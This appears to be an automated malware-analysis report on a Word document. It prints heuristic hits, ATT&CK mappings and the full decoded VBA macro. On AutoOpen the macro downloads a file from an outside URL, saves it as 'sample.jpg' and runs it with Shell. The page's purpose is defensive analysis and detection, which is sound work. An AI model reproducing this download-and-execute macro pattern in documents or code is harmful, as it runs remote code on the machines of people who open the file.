MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening a document. The script attempts to download a file named 'sample.jpg' from a provided URL using WinHttp.WinHttpRequest.5.1 and then executes it using the Shell function. This indicates the document is designed to download and run a secondary payload.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "sample.jpg" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set BinaryStream = CreateObject("ADODB.Stream") -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.jpg$In document text (OLE body)
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.jpgIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1661 bytes |
SHA-256: cd5fb71fd7fa6ab3fb5a8d9fcf0e7ca7623a424251cdbadbc76f46e4ecbba775 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
For j = 1 To ActiveDocument.Paragraphs.Count
sPar = ActiveDocument.Paragraphs(j).Range.Text
sPar = ChangeTextCharset(sPar, "utf-8", "windows-1251")
ActiveDocument.Paragraphs(j).Range.Text = sPar
Next j
SaveBinaryData "sample.jpg", BinaryGetURL("http://the.earth.li/~sgtatham/putty/latest/x86/putty.jpg")
Shell "sample.jpg"
End Sub
Function SaveBinaryData(FileName, ByteArray)
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.Write ByteArray
BinaryStream.SaveToFile FileName, adSaveCreateOverWrite
End Function
Function BinaryGetURL(URL)
Dim Http
Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")
Http.Open "GET", URL, False
Http.Send
End Function
Function ChangeTextCharset(ByVal txt$, ByVal DestCharset$, Optional ByVal SourceCharset$) As String
On Error Resume Next: Err.Clear
With CreateObject("ADODB.Stream")
.Type = 2: .Mode = 3
If Len(SourceCharset$) Then .Charset = SourceCharset$
.Open
.WriteText txt$
.Position = 0
.Charset = DestCharset$
ChangeTextCharset = .ReadText
.Close
End With
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.